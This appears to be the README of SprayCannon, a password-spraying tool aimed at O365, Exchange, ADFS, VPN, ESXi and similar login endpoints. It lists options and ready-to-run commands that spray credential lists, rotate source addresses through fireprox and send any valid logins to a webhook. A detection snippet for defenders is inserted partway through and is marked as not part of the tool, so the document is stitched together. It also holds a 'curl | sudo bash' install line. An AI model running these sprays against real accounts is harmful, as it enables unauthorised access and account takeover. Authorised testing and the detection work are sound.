Arch Linux Debian(based) Linux Kali Mac OS

Why

I got sick and tired of having to remember and manually spray a password every 30-60 min for a userlist, and managing a large list with what passwords had been sprayed for what user was the worst. Also, adding to a userlist added additional problems with either starting over or leaving out missed passwords for new accounts. Additionally, many spraying tools only existed for certain endpoints, i.e. just an o365 spray tool or just an exchange spray tool. I wanted a standard framework that could do any spraying I needed with all the features I wanted. So I created....


There's a wiki now.

SprayCannon

A fast multithreaded password spray tool designed to simplify and automate many password spraying problems I faced.

Features

Current supported spray types

Fully implemented means that the module works as designed. Some protocols may not support MFA detection. For others I have not had a chance to compare the "valid" check for one with MFA enabled (ex. Sonicwall VirtualOffice).

|Type|MFA support|Lockout Detection|Fully implemented|
|----|-----------|-----------------|-----------------|
|ExchangeEAS|no|no|yes|
|ExchangeOWA|no|no|yes (could be a little more refined but fully working)|
|adfs_forms|no|no|yes|
|SonicwallVirtualOffice|no|no|yes (no mfa though) (validation not confirmed)|
|Sonicwall (the digest one)|no|no|yes (validation not confirmed)|
|O365|YES|YES|yes|
|SSLVPN Cisco|no|no|yes ~~(I converted some code from a previous spraying ruby script I wrote that worked, but haven't had a chance to test this one)~~ confirmed with group= --domain flag.|
|VPN Fortinet|no|no|kinda (use at own risk) (validation not confirmed)|
|Spiceworks|no|no|no (no mfa/lockout though) (validation not confirmed)|
|InfinateCampus|no|no|yes|
|Global Protect|no|no|not fully tested|
|ESXI (root web)|no|no (default is 10, be careful)|yes - tested with esxi 6.5, 7.0|
|VmWare Horizon (Domain Joined Web prompt)|no|no|yes|

Examples:
./spraycannon -s msol -u [email protected] -p password123
./spraycannon -s adfs_forms -u usernames.txt -p passwords.txt
./spraycannon -s msol --user-pass-format upffile.txt
./spraycannon -s ExchangeOWA -u [email protected] --user-as-password --target "https://adfs.mydomain.com"

Global options:
    -s, --spray-type=[spraytype]     Set spray type. use --list-spraytypes to get current list
    -t, --target=[ip/hostname]       Target to spray ( could also be a fireprox address )
    -u, --username=[name]            Username or user txt file to spray from
    -p, --password=[password]        Target to spray
    -d, --delay=[time]               time in seconds to delay between password attempts
    -j, --jitter=[time]              time in milliseconds to delay between individual account attempts. default is 1000.
    --domain=[domain]                Sets the domain for options that require domain specification.
    -h, --help                       Print Help menu
    --version                        Print current version
    -v, --verbose                    Print verbose information
Additional Options:
    --threads=[count]                Use worker threads to drasticly speed things up!(default is 1)
    --nodb                           does not use the database
    --user-as-password               Sets the user and password to the same string
    --user-pass-format=[filename]    Supplied file in 'user:password' format
    --webhook=[url]                  Will send a webhook if valid credential is found!! (autodetects Teams, Discord, Slack, and Google Chat URLS) 
    --useragent=[agentstring]        Use a custom useragent string, or a file containing useragents(will chose randomly from them).
    --list-spraytypes                List the available spraytypes.
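
For defenders, the timing that `-d/--delay` and `-j/--jitter` describe shows up in authentication logs as repeated rounds: one failed login per account across many accounts, a long quiet gap, then the same accounts again. The following is an added detection example, not part of SprayCannon; the log format, thresholds and function names are assumptions, and the events are constructed. Source address is deliberately not used as a key, since requests relayed through a proxy endpoint may not share one.

```python
from collections import Counter
from datetime import datetime

# Constructed failed-login events (timestamp, username); not real log data.
SAMPLE = """\
2024-05-01T09:00:01 alice
2024-05-01T09:00:02 bob
2024-05-01T09:00:03 carol
2024-05-01T09:17:30 erin
2024-05-01T09:17:41 erin
2024-05-01T10:00:01 alice
2024-05-01T10:00:02 bob
2024-05-01T10:00:03 carol
"""

def parse(text):
    events = []
    for line in text.splitlines():
        ts, user = line.split()
        events.append((datetime.fromisoformat(ts), user))
    return sorted(events)

def bursts(events, max_gap_s=60):
    """Split time-ordered events into bursts separated by quiet gaps."""
    out, cur = [], []
    for ev in events:
        if cur and (ev[0] - cur[-1][0]).total_seconds() > max_gap_s:
            out.append(cur)
            cur = []
        cur.append(ev)
    if cur:
        out.append(cur)
    return out

def spray_rounds(events, min_users=3, max_per_user=1, max_gap_s=60):
    """Return bursts that are wide (many users) and shallow (few tries each)."""
    rounds = []
    for b in bursts(events, max_gap_s):
        per_user = Counter(u for _, u in b)
        if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
            rounds.append((b[0][0], sorted(per_user)))
    return rounds

def repeated_spray(events, min_rounds=2, **kw):
    """True when the same user set is hit in several separate rounds."""
    sets = Counter(tuple(users) for _, users in spray_rounds(events, **kw))
    return any(n >= min_rounds for n in sets.values())
```

A single user mistyping a password several times (the `erin` lines) forms a narrow, deep burst and is not flagged; only the wide, shallow rounds are.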

Use

Download from releases.

or

Compile yourself

either use the make file

make init       # downloads dependent libs to the local directory 
make            # compiles spraycannon and spdb 
make install    # installs the tools

Compile the manual way

crystal build -p src/spraycannon.cr 
crystal build -p src/spdb.cr 

You can also use:

crystal build -p --no-debug --release

This takes longer to build but is more optimized (not that you need it). It also may not give you help if something breaks... your choice.

Examples:

./spraycannon -s ExchangeEAS -u users.txt -p passwords.txt
./spraycannon -s msol -u "[email protected]" -p passwords.txt
./spraycannon -s vpncisco -u users.txt -p "Password123" --webhook "https://teamswebhook.com/asdfasdfasdf"
./spraycannon -s msol -u emails.txt -p "Password123" --jitter 500 --delay 3600  --target "https://aws.fireprox.instance/fireprox"

TODO

Contributing

spdb

spdb is a simple application to interact with the backend db for SprayCannon. There is now a timestamp for each password spray item, so it is possible to go back and see exactly what time a specific user attempt was sprayed.

interactive commands:

spdb2

spdb2 is the new updated version of spdb. It now features tab completion and a help menu scrolling option while navigating. Features are experimental at this point, but should work as advertised.

On the shoulders of Giants

Some of the available spraytypes/options would not have been possible if not for the previous work done by:

Thank you all for your inspiration and contributions to the community!!!

Crystal Install help

Spraycannon is written in crystal-lang, a language similar to Ruby in syntax that produces a compiled binary, is extremely fast, and is easy to work with. Installing can be done as below. If you don't trust these commands, go here: https://crystal-lang.org/install/


Arch based linux distros

sudo pacman -S crystal shards 

Debian/RedHat based linux distros(Kali too)

curl -fsSL https://crystal-lang.org/install.sh | sudo bash

Windows (Crystal not fully supported on windows yet) there are several options:

* Note: Crystal doesn't have an official Windows compiler release yet. If a bug is found, please create a bug report and I will try to address it.

MacOS(homebrew):

brew update
brew install crystal

* Note: I don't have a Mac, so I can't quite support MacOS. If a bug is found, please create a bug report and I will try to fix it.